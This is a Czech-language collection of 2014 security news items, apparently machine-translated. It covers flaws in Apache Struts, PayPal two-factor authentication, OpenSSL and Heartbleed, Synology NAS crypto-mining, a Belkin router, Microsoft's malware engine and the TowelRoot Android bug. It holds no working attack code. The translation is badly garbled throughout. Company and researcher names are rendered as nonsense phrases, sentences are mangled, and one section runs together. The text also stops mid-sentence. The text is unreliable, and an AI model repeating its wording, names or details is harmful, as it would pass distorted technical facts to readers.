VMware Patche Apache Struts Nedostatky v vCOPS
29.6.2014 Zranitelnosti
VMware je oprava několika závažných chyb zabezpečení v její správní apartmá vCenter Operations Center, z nichž jeden by mohl vést ke vzdálenému spuštění kódu na ohrožené strojů.

Všechny zranitelnosti, které společnost záplaty ležet v Apache Struts Java aplikačního rámce, a nejzávažnější z nich je CVE-2014-0112, která umožňuje útočníkovi spustit libovolný kód.

"ParametersInterceptor v Apache Struts před 2.3.16.2 není správně omezit přístup k metodě GetClass, který umožňuje vzdáleným útočníkům" manipulovat "s ClassLoader a spustit libovolný kód pomocí vytvořeného požadavku," zranitelnost popis říká.

Apache pevné zranitelnost v nové verzi Struts zpět v dubnu. Problém byl vytvořen z důvodu neúplného patch pro předchozí zranitelnosti v Struts. Tři Struts zranitelnosti všechny jsou řešeny ve vydání verze 5.8.2 VMware vCOPS, uvedla firma.

Další dvě, méně závažné zranitelnosti opravené v nové verzi vCOPS jsou CVE-2014-0050 a CVE-2014-0094. První chyba je problém, který by mohl vést ke stavu denial-of-service-li zneužita vzdáleným útočníkem.

"MultipartStream.java Apache Commons FileUpload než 1.3.1, jak je použit Apache Tomcat, JBoss Web, a jiných produktů, umožňuje vzdáleným útočníkům způsobit odmítnutí služby (nekonečné smyčky a spotřeby CPU) přes řemeslně hlavičce Content-Type, který obchází určené podmínky výstupní smyčka je, " poradní říká.

CVE-2014-0094 je také vzdáleně využitelný neověřeného útočník, který by mohl manipulovat se složkou Struts.

"ParametersInterceptor v Apache Struts před 2.3.16.1 umožňuje vzdáleným útočníkům" manipulovat "s ClassLoader pomocí parametru třídy, který je předán metodě GetClass," poradní říká.


Chyba Umožňuje útočníci Bypass PayPal dvoufaktorové ověřování
29.6.2014 Zranitelnosti
Tam je chyba zabezpečení ve způsobu, že PayPal zpracovává určité požadavky z mobilních klientů, které mohou útočníkovi umožnit obejít mechanismus autentizace pomocí dvou faktorů pro služby a převod peněz z účtu oběti pro všechny příjemce si zvolí.

Chyba spočívá ve způsobu, že ověřování toku PayPal pracuje s mobilními aplikacemi služba je pro iOS a Android. Je to na straně serveru, a výzkumníci na Duo Security vyvinul proof-of-concept aplikace, které lze zneužít tuto chybu zabezpečení. PayPal si byla vědoma tohoto problému od března a zavedla řešení, ale není v plánu kompletní opravu až do konce července.

"Útočník potřebuje pouze PayPal uživatelské jméno a heslo oběti, aby se přístup k chráněnému účtu dvoufaktorové a poslat peníze. Ochrana poskytovaná mechanismem dvoufaktorové Security Key lze obejít, a v podstatě zrušil, "Zach Lanier, senior bezpečnostní výzkumník Duo Security, napsal ve svém vysvětlení zranitelnosti a jeho účinky.

"Zatímco mobilní aplikace PayPal je aktuálně nepodporují 2fa povolen účty, je možné účinně oklamat mobilní aplikace přes PayPal do ignorovat 2fa vlajku na účet, následně umožňuje útočníkovi přihlásit bez nutnosti sekundární autentizace."

PayPal dává uživatelům možnost používat formu dvoufaktorové autentizace, který je dodáván v několika podobách, z nichž každá generuje jednorázové heslo pro použití při přihlášení. Systém lze použít na webových stránkách PayPal, ale to není podporována mobilními aplikacemi PayPal právě teď. Způsobem, že zranitelnost funguje, vědci byli schopni vytvořit aplikaci, která triky PayPal API myslet, že mobilní aplikace byl přístup k účtu, který nemá dvoufaktorová autentizace povolena, zcela ignoruje ochranu 2fa.

Aplikace jsou postaveny jednání na dvou různých účinných látek na PayPal, z nichž jeden se stará o ověřování a druhý, který se stará o převod peněz po přihlášení. Při pohledu na zranitelnost, badatelé Duo je si všiml, že když se servery PayPal odpověděl na žádost o příspěvek z mobilní aplikace pro 2fa povoleným účtem, aplikace by pak zobrazí chybová zpráva říká, že 2fa nebyla podporována a odešle uživatele zpět na přihlašovací obrazovce. Ale když nahradil hodnoty v závislosti na serveru, pokud jde o 2fa na "falešné", aplikace by jednoduše umožňuje uživateli na účet, obcházet ochranu 2fa.

Lanier pak se znovu podíval na původní odpovědi serveru a zjistil, identifikátor relace.

"Jak se ukázalo," session_token "se používá pro autorizaci vůči mobileclient.paypal.com, jinak (veřejně) načerno SOAP-based API, které poskytuje další funkce související s účtem, včetně ale ne omezené na posílání peněz," napsal.

"Pak jsme vstoupili do" poslat peníze "procesu v mobilních aplikací, znovu zachytit provoz s krkat. Díky tomu jsme byli schopni sledovat potřebné žádosti / odpovědi a SOAP obálky (číst bolestivé XML), které tvoří převod PayPal fond ze svých mobilních aplikací. Přenos Proces prostředků se ukázalo, že je výměna čtyřech krocích, s každým požadavkem, který musí být hodnoty jedinečné celkové transakce. "

Použití aplikace se postavit tuto chybu zabezpečení zneužít, vědci byli schopni převést peníze z 2fa chráněné účtu jen s uživatelským jménem a heslem. V rozhovoru, Lanier řekl, že se libovolný počet způsobů, jak dosáhnout tohoto úkolu, žádný z kterého je velmi složité.

"Existuje spousta případů PayPal hesla je ohrožena v obří databáze skládek, a tam je také obrovský nárůst PayPal související phishing," řekl. "Tento přístup je již používán. Lidé jsou již dlouhou dobu a jsou i nadále dělat tak. Celé dva faktorem, co měl, abyste se cítili v teple a fuzzy-li heslo je ohrožena. Asi bych použít jednu z těchto technik, které jsou zatraceně účinné, nebo možná iterovat veřejných skládek hesel. "

PayPal chyba byla objevena vnější výzkumník, Dan Saltman, který požádal Duo Security pro pomoc ji potvrdíte a komunikaci s bezpečnostním týmem PayPal.


AskMen Site ohrožena jaderného balíčku Exploit Kit
25.6.2014 Zranitelnosti

Uživatelé, kteří navštíví AskMen.com, pánské zábavy a životního stylu portál, jsou hit se škodlivým kódem, případně vyplývající z jaderného balíčku využívat sadu, vědci dnes oznámila.

Pokud uživatel narazí na místě - nebo lokalizovaná verze (aus.askmen com, atd. [.]) Z něj - škodlivý kód je načten automaticky a uživatel je přesměrován na jinou webovou stránku.

Tento konkrétní Java využívat byla hybnou silou na začátku tohoto roku v botnet Java-založené , a byl také distribuován LightsOut Exploit soupravy v díře zavlažování útoku , který se zaměřil na energetické a ropné odvětví.

Podle vědců z Websense, který objevil kompromis a vyslán o tom na svém blogu Security Labs , zdá se, Jaderná balení využívat sadu - nebo variantu soupravy - je používán k provádění této kampaně.

Websense poznamenává, že využívat strana zřejmě používá stejný zmatek techniky Jaderná balení používá a používá stejné výše uvedené Java využívat, stejně.

Škodlivý kód, který spouští přesměrování se zatemnil a lze je nalézt v dolní části stránek JavaScriptu, v závislosti na firmě.

"Zmatek je zde použito jednoduché kódování base64, které lze snadno de-popletl k přesměrování na webové stránky vytvořené jeho generace domény algoritmu, stejně jako samotný DGA," napsali vědci.

Sada také klesne Caphaw , bankovní malware, který byl spatřen kolovat v několika reklamách YouTube loni, že přinejmenším mohl dát přístup útočníkovi stroji oběti, vědci varují.

Websense tvrdí, že se natáhl, aby AskMen.com je webmaster, pokud jde o kompromis, ale má ještě obdržet odpověď tak daleko.

Nicméně, když dosáhl v pondělí odpoledne, Johnny Testa, AskMen.com je marketing a sociální média manažer, trval na tom webu, který je ve vlastnictví vydavatelského koncernu Ziff Davis, nikdy neobdržela žádné e-maily od společnosti Websense.

Testa dodal, že vývojáři AskMen je nebyli schopni detekovat malware na svých stránkách a to buď.

Na stránkách tvrdí, že je "Ne. 1 pánská životní styl publikace, "a zřejmě dosáhne nahoru na 14 milionů amerických čtenářů měsíčně, čísla, které by se mohly promítnout do značné fondu obětí na útočníků, pokud je to opravdu zranitelný.


Analýza 3000 zranitelností v SAP
24.6.2014 Zranitelnosti
Podle oficiálních informací z SAP portálu, které více než 3000 zranitelností bylo uzavřeno SAP.

Zde je 6 zdůrazňuje z výzkumu prováděném týmem ERPScan během 7 let hlubší analýzu SAP zranitelnosti. Významný podíl analyzovaných zranitelnosti byl nalezen na ERPScan výzkumného týmu sám. Procento chyb v systému SAP je mnohem vyšší, než si lidé obvykle myslí - počet zranitelností uzavřených SAP je více než 3000, což se rovná asi 5% všech zranitelností kdy . zveřejněny na internetu Zájem o bezpečnost SAP roste exponenciálně -. podíl zranitelností zjištěných třetí strany ve všech zranitelností opravené SAP vzrostl z cca 10% v pozdních 2000s na 60-70%, v posledních měsíčních aktualizací SAP dělá dobré kroky v SDLC - počet chyb v SAP za měsíc se snížil přibližně 2-krát ve srovnání s vysokou vrcholu v roce 2010. Zájem o hacking nových produktů SAP roste - řada problémů nalezených v nových produktů SAP, jako jsou SAP HANA, roste rychleji než v jiných zemích, i když tam jsou asi 10 otázek celkem. Co je populární tradiční bezpečnosti není vždy populární s bezpečností SAP -. korupce paměť zranitelnosti je 7 krát méně populární v SAP, než v obecné typy produktů SAP je velmi složitý systém, a významnou součástí bezpečnostních opatření leží na bedrech správců - problémy s konfigurací v systému SAP je 5 krát více populární než v obecné typy produktů. Pojďme se blíže podívat na podrobnosti s pomocí připomínky ERPScan ČTÚ Alexander Poljakov. Podle cvedetails.com, internetové stránky pro výpočet nejzranitelnější dodavatele počtem CVEs, SAP je na 37. místě v kompletní seznam dodavatelů. Ale ne všechny otázky SAP mají CVEs. SAP sama o sobě není jejich zveřejnění, a externí výzkumníci to buď jen čas od času. Nicméně, pokud budeme počítat podle počtu veřejných rad (tam je asi 500 z nich), SAP je na 15. místě. Tak, že pokud budeme počítat podle celkového počtu vyřešených chyb zabezpečení (bezpečnostní poznámky více než 3000), SAP bude sdílet druhé místo poté, co Microsoft zajímavé. Ale to stále není platné srovnání, vzhledem k tomu, že Microsoft pravděpodobně zavře mnohem více problémů interně. Zatímco počet zranitelností uzavřených SAP Security Poznámky (malé patche) za rok klesá, SAP pohybuje mnoho zranitelných míst na Service Pack, takže v oblasti bezpečnosti poznamenává, pouze velmi kritické otázky a problémy, které byly nalezeny externími výzkumnými pracovníky. Takže, v předchozích letech, jen asi 10% z měsíčních publikovaných zranitelností byly nalezeny externími výzkumnými pracovníky, ale až 60-70% v novějších aktualizacích. Ve stejné době, celkový počet bezpečnostních záplat SAP za rok se snižuje. Různé SAP výrobky mají různé množství zranitelností nalezených ročně. U některých nových SAP platforem, jako je Hana, procento problémů roste každý rok, zatímco pro JAVA platformy procento otázek je zhruba stejný každý rok. Ve stejné době, množství problémů nalezených ve starých platforem, jako je například ABAP, klesá trochu, a počet zranitelností u klientské aplikace, ve srovnání s vrcholem v roce 2010, kdy jsme začali je zkoumat, klesá výrazně. Zatímco typické problémy mají více či méně stejné výsledky, máme dvě oblasti, kde statistiky jít jinak. První ze všech zranitelností korupce paměti, jako je přetečení vyrovnávací paměti - nejoblíbenější zranitelností ve světě (14% ze všech otázek) - představují pouze 2% v SAP, a pouze 1% z nich je ve skutečnosti vzdáleně zneužít, a dokonce i ty jsou většinou na klientské aplikace. Důvod je jednoduchý. Problémy s poškozením paměti jsou obtížně využít v systému SAP, to je důvod, proč jsme vždycky říkám, v našich seminářů a kurzů, které budete potřebovat náklad pro různé verze a platformy. Ale je tu vždy zůstává malá šance, že se něco děje. Nicméně, pro Pentesters a zejména pro zločinci, tyto otázky nejsou zajímavé, protože otázky týkající se konfigurace, řízení přístupu, nebo autentizace je mnohem jednodušší jak pro pentest a za podvod. Zadruhé, řada otázek týkajících se konfigurace je o 11% otázek SAP, zatímco obecně tyto otázky představují pouze asi 2%. Tento výsledek je zcela předvídatelné pro lidi, kteří byli v oblasti bezpečnosti SAP na dlouhou dobu. Vědí, že největším problémem je složitost a přizpůsobení řešení SAP. SAP má tisíce různých konfiguračních vylepšení v různých platformách, a dělají skutečný rozdíl. Bohužel, tyto problémy s konfigurací, nejsou tak snadno opravit, protože mají vliv na obchodní procesy. Přinejmenším, budete muset restartovat systém překonfigurovat. Například, zavřete chybu zabezpečení v protokolu ověřování služby SAP Software Deployment, musí být nainstalována nová verze klienta a serverového softwaru, a to může být někdy docela náročné. Je těžší sledovat, kontrolovat a kontrola než jednoduše aplikovat patche, které se obvykle v blízkosti pouze typické otázky, jako je XSS nebo procházení adresářů.


Google BoringSSL Nejnovější OpenSSL stolu k povrchu
24.6.2014 Zranitelnosti
V roce-plus, protože dohled, soukromí a Snowdenová se stala součástí každodenního zabezpečení konverzace, technologií, které zabezpečí on-line komunikaci a obchod staly Job 1 pro odborníky touží připojit zející trhliny a podepřít další použitelnosti nedostatky.

OpenSSL je pravděpodobně v horní části seznamu, značně zvětšená o Heartbleed zranitelnosti . Dost špatné, že strašidlo je možné NSA backdoor visí nad jakoukoliv šifrovací technologii, ale i další nedostatky, jako je nedostatek finančních prostředků a lidských zdrojů, které se vynořily kolem OpenSSL od Heartbleed zejména.

Minulý pátek, inženýr Google Adam Langley oznámil , že další vidlice z populárních kryptografických knihoven byl v pracích, spojování LibreSSL jako potenciální alternativy k OpenSSL. Dočasně daboval BoringSSL , tato verze znamená posun pro Google, který je postaven tolik jako 70 záplat pro OpenSSL pro používání ve svých výrobcích, včetně Androidu a Chrome.

"Takže jsme přepínání modelů do jednoho, kde dovážíme změny od OpenSSL spíše než rebasing nad nimi," řekl Langley. "Výsledek, že se začnou objevovat v úložišti Chrom brzy a v průběhu času, doufáme, že se ji používat v Androidu a vnitřně příliš."

Google patchwork verze OpenSSL se stalo nepraktické, řekl Langley.

"Použili jsme několik náplastí na horní OpenSSL po mnoho let. Některé z nich byly přijaty do hlavního OpenSSL repozitáře, ale mnoho z nich nezapadají se zárukou OpenSSL v API a ABI stabilitu a mnozí z nich jsou příliš experimentální, "řekl. "Ale jak Android, Chrome a další produkty začaly potřebovat nějakou podmnožinu těchto oprav, věci se staly velmi složité. Vynaložené úsilí udržet všechny tyto opravy (a tam jsou více než 70 v tomto okamžiku) přímo přes více bází kódu je stále příliš mnoho. "

Langley řekl BoringSSL není chtěl být náhradou za OpenSSL.
Langley řekl BoringSSL není chtěl být náhradou za OpenSSL a že společnost Google bude i nadále přispívat bezpečnostní záplaty k projektu a importovat žádné změny. Google je také součástí konglomerátu financuje iniciativu základní infrastrukturu a OpenBSD nadace, iniciativy, jejichž cílem je financovat open source projekty, které jsou kritické internetové infrastruktury.

BoringSSL bude také žít mírumilovně po boku LibreSSL, vidličkou oznámil v dubnu zakladatel OpenBSD, Theo de Raadt. LibreSSL již vymazán více než 90000 řádků kódu C v OpenSSL v dubnu, a byly zavedeny moderní programovací C praktiky.

"Důležité chyby seděl v OpenSSL v trackeru na čtyři roky, dokud jsme je našli, a pevně je v našem stromu," uvedl developer Bob Beck. "Většina kódu nepoužívá nic blížící se osvědčených postupů pro moderní C kód. Hodně to bude vaše oči krvácet, a vrátit zpět do své lebky, jak váš mozek se snaží zoufale není to vidět. Existuje spousta kouzelných délek strun v tam, že jsme pomalu zabíjí. "

De Raadt, mezitím dal své požehnání na mailing listu OpenBSD .

"Myslím, že všichni pracují na LibreSSL je rádi, zprávy o BoringSSL. Volba je dobrá! "Řekl de Raadt. "Jejich prioritou je v bezpečí, ne na ABI kompatibilitu. Stejně jako my. Postupem času, mám podezření, Google verze bude také stát "se sníženým API", protože vyžadují menší podporu starších aplikací. To může dát LibreSSL příležitost k hlavě ve stejném směru, v případě, že aplikace jsou ochotni ... "


Zpomalení OpenSSL Heartbleed Patch Progress o dva měsíce později
24.6.2014 Zranitelnosti
Je to už více než dva měsíce poté, co zprávy zlomil na Heartbleed zranitelnosti v OpenSSL jeden z nejvíce široce rozmístěných kryptografických knihoven na internetu je. V následujících dnech a týdnech, které následovaly po vzniku chyby, která postihla neznámá, ale pravděpodobně obrovský pás na webu, prodejci byli připravení poskytnout záplaty. Nicméně, nový výzkum naznačuje, že horlivost opravit široce uveřejněný chyba může být slábne.
Robert Graham, bezpečnostní výzkumník a majitel Errata Security, bylo sledování patch pokrok Heartbleed, protože krátce poté, co vyšlo najevo. Jen několik dní poté, co Heartbleed stal se známý, Graham provedl scan portu 443. provozu a zjistil, že 615268 stroje byly zranitelné . Měsíc po tom, Graham provedl druhý scan portu 443 a zjistil 318239 stroje zranitelný . V sobotu předvedl třetí skenování, zjištění, že 309197 stroje zůstávají zranitelné .
Je důležité si uvědomit, že údaje zobrazené Grahama skenování neodrážejí celistvost všech systémů postižených Heartbleed. Nicméně, port 443 je hlavní dopravní tepnou pro provoz protokolu HTTPS, který se opírá o SSL, takže nálezy Graham je pravděpodobně odrážet alespoň částečně reprezentativní vzorek širší skutečnosti týkající se realizace opravy pro Heartbleed.
"To znamená, lidé se zastavili ještě snaží opravit," napsal Graham na svém blogu. "Měli bychom vidět pomalý pokles v příštím desetiletí jako starší systémy se pomalu nahrazeny. I deset let od teď, když jsem ještě čekat, že najde tisíce systémů, včetně těch kritických, stále zranitelné. "
Graham plánuje provést skenování znovu příští měsíc, pak na šest měsíců, a jednou za rok po tom pohybu vpřed.
Heartbleed je nebezpečný Internet-široký chyba, která může být využita k ukrást citlivé informace, jako jsou uživatelská pověření na neopravených systémech, a také soukromé šifrovací klíče, pokud je útok zopakuje dost často.
Navzdory těmto zjištěním, že tvůrci kritické infrastruktury a dalšího softwaru nadále opravit Heartbleed do svých produktů , což je dobrá věc, za to, že vědci stále hledají nové způsoby, jak využívat ji .


Hacker Využije NAS Chyby dolu $ 620K v Dogecoin
19.6.2014 Incidenty, Zranitelnosti
Hacker, dobře-zběhlý v malware a využívat vývoje, využil chyb v Synology Network Attached Storage boxy populární domácích uživatelů až těží více než 600.000 dolarů v hodnotě digitální měny Dogecoin.

Výzkumníci Pat Litke a David Shear Dell SecureWorks "Counter Threat Unit zveřejněny podrobnosti o útoku, který využíval čtyři chyby zabezpečení v systému Synology DiskStation Manager boxy "Linux-založený operační systém. Chyby byly hlášeny v září loňského roku a oprava v únoru.

Útoky se stal veřejností na 8 únoru, kdy uživatelé hlásili špatný výkon a vysoké využití procesoru, Litke a smyku řekl.

"Nakonec bylo zjištěno, že příčinou nadměrné spotřeby zdrojů bylo kvůli nelegitimní software, který byl infikován systémů, který ironicky, byl uložen ve složce s označením" PWNED, "řekli.

Chyby byly vážné, a uživatelé byli vystaveni po dobu pěti měsíců.
Chyby byly vážné, a uživatelé byli vystaveni po dobu pěti měsíců. Výzkumník Andrea Fabrizi hlášeny problémy, dne 10. září. Chyby v rozmezí od vzdáleného emise soubor ke stažení, kde ověřené Uživatelé byli umožněno stáhnout si soubor-včetně hesel souborů vlastněných jiným uživatelům systému DSM, na příkaz vstřikování zranitelnosti, a dva problémy, které vedly k dílčí dálkové obsahu ke stažení.

Litke a smyku řekl, že s použitím pokročilé vyhledávání Google, by útočníci najít téměř milion přiznání za ohrožené Synology NAS boxy a často mohly být směřovány přímo na souborovém systému Box.

Mezi 1 února a 9. května vyhledává portu 5000, stejný port, na kterém Synology NAS boxy poslouchat, vzrostla na nebývalou úroveň, SANS Internet Storm Center řekl.

Litke a ve smyku, mezitím se podařilo vypáčit "pwned" složku našel na napadených krabic a netrvalo jim dlouho přijít na to, že hackeři se důlní cryptocurrency. Útočník klesl CPUMiner malware, který byl vylepšený pro Synology NAS hardware. Malware otevřel zadní vrátka a připojit přes port 8332 na vzdálený server, Litke a smyku řekl.

"Tato adresa není známa žádná veřejně dostupných důlních bazénů," řekli, "a bylo tedy pravděpodobné, soukromý bazén používá herec hrozeb pro osobní zisk."

Výzkumníci byli schopni najít důkazy o cryptocurrency blockchain v kódu řetězce, stejně jako na botmaster je veřejný klíč, který odpovídal konkrétní Dogecoin peněženku.

"Zkoumáním kladkostroje Dogecoin na této adrese (stejně jako jeden další), jsme byli schopni se shodují celkové vytěžené hodnotu přes 500 milionů Doge, nebo zhruba 620.496 dolar USD (z nichž většina byla vydělal v lednu a únoru tohoto rok), "napsal Litke a ve smyku.

"K dnešnímu dni, tento incident je jeden z nejdůležitějších ziskové, nelegitimní důlní provoz. Tento závěr je částečně založen na předchozích šetření a výzkumu, kterou vykonal Counter Threat Unit, stejně jako další vyhledávání na internetu, "řekli. "Jako cryptocurrencies nadále nabírat rychlost, jejich popularita jako cíl pro různé malware budou i nadále stoupat."

Vzhledem k tomu, popularita a potenciální zisk z Bitcoin a dalších cryptocurrencies, to je přirozené, že hackeři by mohly obrátit svou pozornost k nedovolené těžby. Počet případů byly hlášeny, dokonce méně než možné podnik pomocí CoinKrypt malware na Android zařízení k těžbě Litecoin a Dogecoin. Mobilní zařízení nemají moc zpracování a zdrojů stolních počítačů a serverů, například, aby CoinKrypt podnik trochu víc než na obtíž.


Directory Belkin Záplaty Traversal Chyba v bezdrátovém směrovači
19.6.2014 Zranitelnosti
K dispozici je vážná chyba zabezpečení v bezdrátovém směrovači Belkin N150, které mohou umožnit vzdálené, neautorizovaný útočník číst jakýkoliv systémový soubor na zranitelné routeru.

Chyba je adresář traversal zranitelnost a CERT / CC poradní říká, že všechny verze směrovače, které jsou spuštěny firmware do a včetně verze firmwaru 1.00.07 jsou zranitelné. N150 je low-end bezdrátový domácí router, a společnost vyrobila novou verzi firmware opravit chybu.

"Belkin N150 bezdrátový router firmware 1.00.07 a výše obsahují cesta traversal chyby zabezpečení prostřednictvím vestavěného webového rozhraní. Webproc cgi modul přijímá parametr getpage, který trvá cestu k souboru neomezený jako vstup. Webový server běží s právy roota ve výchozím nastavení, což umožňuje zlými úmysly přečíst libovolný soubor v systému, " poradní říká.

Zákazníci, kteří mají zranitelné router by měl aktualizovat firmware co nejdříve na opravenou verzi.
Zákazníci, kteří mají zranitelné router by měl aktualizovat firmware co nejdříve na opravenou verzi, která je 1.00.08. Procházení adresářů útoky umožnit útočníkovi vynutit aplikaci na cílovém systému pro přístup k souboru, které by neměly být přístupné.

"Aktualizace firmwaru vašeho bezdrátového směrovače opravuje chyby předchozí verze a zlepšuje jeho funkčnost. Tato akce musí být provedena, zejména pokud začnete zažívá problémy s připojením s přístrojem, "Belkin poradní říká.


Microsoft varuje před Denial-of-Service Bug v Malware Protection Engine
19.6.2014 Zranitelnosti
Microsoft dnes vydala bezpečnostní poradenství upozorní uživatele vážné zranitelnosti v současnosti antimalware motoru v několika bezpečnostních produktů, včetně Windows Defender, Forefront a další.

Aktualizace bude automaticky posune Microsoft Malware Protection Engine v 48 hodin, řekl Microsoft.

Nejsou známy žádné veřejné využije pro chyby, které byly zveřejněny v soukromém inženýrem Google Tavis Ormandy, dlouholetý bug-lovec, a příležitostné trnem v oku Microsoftu. Microsoft mezitím prohlásil, že využije je nepravděpodobné, protože by bylo obtížné stavět.

Útočníci by mohl zneužít tuto chybu odesláním škodlivý soubor na oběti, nebo nalákat je na webové stránky hosting škodlivý soubor.
Útočníci by mohl zneužít tuto chybu odesláním škodlivý soubor na oběti, nebo nalákat je na webové stránky hosting škodlivý soubor.

"Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl zabránit Microsoft Malware Protection Engine od dotčených monitorovacích systémů do speciálně vytvořený soubor je ručně odstraněny a služba se restartuje, "uvedl Microsoft ve svém poradenství.

Je-li motor je nakonfigurován pro ochranu v reálném čase, bylo by to automaticky prohledá soubory způsobuje skenování do vypršení časového limitu, jinak využívat by být spuštěn v době plánovaného prověřování.

Lodě Microsoft Malware Protection Engine s řadou produktů společnosti Microsoft, včetně serverů a koncových verzích systému Windows Defender pro systém Windows 8 a 8.1, Microsoft Security Essentials, nástroj pro odstranění škodlivého softwaru, Microsoft System Center 2012 a Microsoft Forefront Client, Endpoint Protection a Sharepoint verze.

"Obvykle není nutná žádná akce podnikových správců nebo koncovým uživatelům instalovat aktualizace pro Microsoft Malware Protection Engine, protože vestavěný mechanismus pro automatickou detekci a nasazení aktualizací bude platit aktualizaci do 48 hodin od vydání," řekl Microsoft . "Přesný časový rámec je závislá na použitém softwaru, připojení k internetu, a konfigurace infrastruktury."

Ormandy neodhalil Microsoft zranitelnost v minulosti, některé z nich veřejně.

Loni v červenci, Microsoft záplaty kritickou zranitelnost jádra Windows po Ormandy května udělal místo na Plný seznam Disclosure, kteří hledají pomoc s zneužít k chybě jádra našel. Ormandy řekl, že měl pracovní využití v rámci jednoho týdne, a také se některé záběry společnosti Microsoft na svém osobním blogu, volat společnost nepřátelsky vůči bezpečnostních výzkumníků.

Načasování prvotního odhalení bylo trapné pro Microsoft, která nemohla otočit patch v čase pro své června 2013 Patch Tuesday aktualizací , místo konání off až do července. Situace, mezitím, byl komplikován vydáním Metasploit modulu využívajícího zvyšováním oprávnění zranitelnost.


Android Root Access Chyba zabezpečení týkající se většiny zařízení
19.6.2014 Zranitelnosti
Nedávno zveřejněny zranitelnost ve verzi 3.14.5 linuxového jádra je také přítomný ve většině verzí Androidu a mohl dát útočníkům schopnost získat root přístup na dotčených zařízeních.
Výzkumníci z vyniká socha Láokoóna Mobile Security volají bug "TowelRoot," protože to je ten samý zranitelnost (CVE-2014-3153) využívány nejnovější Android zakořenění nástroj vyvinutý George Hotz (geohotovu). Úspěšné využívání chyby Linux v rámci operačního systému Android by útočník přístup pro správu telefonu oběti. Konkrétně, takový přístup by mohl povolit, že stejný útočníkovi spustit další škodlivý kód, obnovit soubory a data zařízení, obtokové třetích stran nebo podnikové bezpečnostní aplikace, včetně kontejnerů, jako jsou bezpečné Knox sub-operační systém společnosti Samsung, a vytvořit zadní vrátka pro budoucí přístup k obětem zařízení .
Jeff Forristal , technologický ředitel na mobilní bezpečnostní firmy Bluebox bezpečnosti, vysvětlil Threatpost v rozhovoru, že Linux futex chyba ovlivňuje Android zařízení, protože tato zařízení běží na linuxovém jádře, a jakmile se chyba stala veřejností, to bylo jen otázkou času, kdy se někdo vyvinul pro Android specifické využití pro něj. George Hotz, známá postava v jailbreaking a zakořenění scénu, se tu další krok.
"To je docela běžná praxe / recept na zakořenění scéně Android: čekají na univerzální linuxového jádra zranitelnosti do povrchových, pak závod na vytváření Android specifické využití pro to, aby se vykořenit zařízení," řekl Forristal.
Tato chyba zabezpečení existuje ve verzi Android 4.4 a dřívější, a je proto prezentovat na téměř každé komerční sestavení, včetně velmi populární Samsung Galaxy S5, podle výzkumu z vyniká socha Láokoóna Mobile Security . Další zranitelné zařízení jsou řekl, aby zahrnoval Samsung poznámka 3, LG G Flex, Motorola RAZR HD / M a Razr Maxx HD a Sony Xperia E1, C6603, C5303, Xperia T, Xperia Z1 a Xperia SP mezi ostatními.
"Tato chyba je v současnosti pod kódovým označením TowelRoot po zakořenění nástroj, který byl propuštěn na mobilních fórech, která používá tuto chybu zabezpečení zneužít fandit většina z populárních mobilních zařízení na trhu," píše Ohad Bobrov, vyniká socha Láokoóna Security viceprezident pro výzkum a vývoj. "Tento nástroj je široce uveřejněný a je snadno dostupný pro použití bez potřeby technického know-how."

V e-mailu rozhovoru, Michael Shaulov, generální ředitel společnosti vyniká socha Láokoóna, vysvětlil, že v případě bezpečných prostředích Samsung Knox, využít by vyvolat ochranu a vydat upozornění pro uživatele, ale to, že v konečném důsledku, by útočník mohl ještě získat root přístup.

"Právě teď tato chyba zabezpečení je používán pouze pro zakořeňování nástroje a ještě se ukázat v každém škodlivého vzorku," vysvětluje Bobrov. "Poučení z minulosti, můžeme předpokládat, že je jen otázkou času, kdy se využije k této chybě zabezpečení jsou distribuovány prostřednictvím jiných kanálů."

S cílem získat root telefonu oběti pomocí této chyby zabezpečení, útočník by musel k řemeslu využít a zabalit ho do škodlivého aplikace. Protože toto, uživatelé, kterým je třeba zabránit trhy třetích stran a vyhnout se po stinných odkazy nebo kliknutím na podezřelých příloh by měl být imunní.

"Riziko tohoto konkrétního linuxového jádra chyba, protože si uvědomil, na zařízení se systémem Android, je to, že neprivilegované generické Android aplikace s nepřátelskými úmysly mohou také využívat stejné jádro náchylnost k jiným zlem (non-root) důvodů," řekl Forristal. "To nemá vůbec nic společného s TowelRoot nebo rytí obecně - je to jen popisek, že tentokrát je to velmi univerzální bezpečnostní riziko, které je relevantní bez ohledu na zakořenění sklony vlastníka zařízení."


OpenSSL vydává záplaty na kritické MITM, spuštění kódu chyby
17.6.2014 Zranitelnosti
Uživatelé OpenSSL, budete muset znovu opravit. Tým OpenSSL vydala aktualizaci zabezpečení, která řeší šest zranitelností, z nichž dvě by mohly být považovány za kritické. První z nich je SSL / TLS MITM chyba (CVE-2014-0224). "Útočník použitím pečlivě budovaný handshake můžete vynutit použití slabé klíčování materiálu v OpenSSL SSL / TLS klientů a serverů. Toto může být zneužita (MITM) útoku man-in-the-middle, kdy útočník může dešifrovat a upravit provoz z napadeného klientem a serverem, "to bylo vysvětleno . "útok lze provést pouze mezi zranitelné klienta * a klienty * Server. OpenSSL jsou zranitelné ve všech verzích OpenSSL. Servery jsou známy jako zranitelné v OpenSSL 1.0 pouze. 1 a 1.0.2-beta1. Uživatelé serverů OpenSSL starší než 1.0.1, se doporučuje aktualizovat jako prevence. " "Dobrou zprávou je, že tyto útoky je třeba man-in-the-middle pozici vůči oběti, a že ne- OpenSSL klientů (IE, Firefox, Chrome na ploše a iOS, Safari atd.), nejsou dotčeny. Nicméně, všichni uživatelé OpenSSL je třeba aktualizovat, " poznamenal Adam Langley, výzkumník z bezpečnostního týmu společnosti Google, a nabídl jeho vlastní analýzu . chyba . chyba byla objevena výzkumníkem Masashi Kikuchi, který vysvětlil další informace o chybě, a jak se objevil v blogu "Tato chyba existuje již od prvního vydání OpenSSL," on poznamenal , pak dodal: " Největší důvod, proč chyba nebyla nalezena více než 16 let je to, že hodnocení kódů byly nedostatečné, a to zejména z odborníků, kteří měli zkušenosti s prováděním TLS / SSL. Pokud recenzenti měli dostatek zkušeností, měly by být ověřeny OpenSSL kód stejným způsobem dělají svůj vlastní kód. Mohli zjištěn problém. " SANS ISC CTO Johannes Ullrich poznamenat , že i když chyba je závažná, "aby bylo možné využít tuto otázku, jak klient a server musí být zranitelné, a jen openssl 1.0.1 je náchylná na serverech." On také definuje DTLS neplatný fragment zranitelnost (CVE-2014-0195), opravenou v téže aktualizace jako kritické, protože to může vést ke spuštění nežádoucího kódu na zranitelné klienta nebo serveru. Naštěstí jen aplikace využívající OpenSSL jako klient DTLS nebo serveru ovlivněna. "nově zveřejněny OpenSSL zranitelnost (CVE-2014-0224) umožňuje aktivní síť útočník aplikovat ChangeCipherSpec (CCS) zprávy do handshake vynutit používání 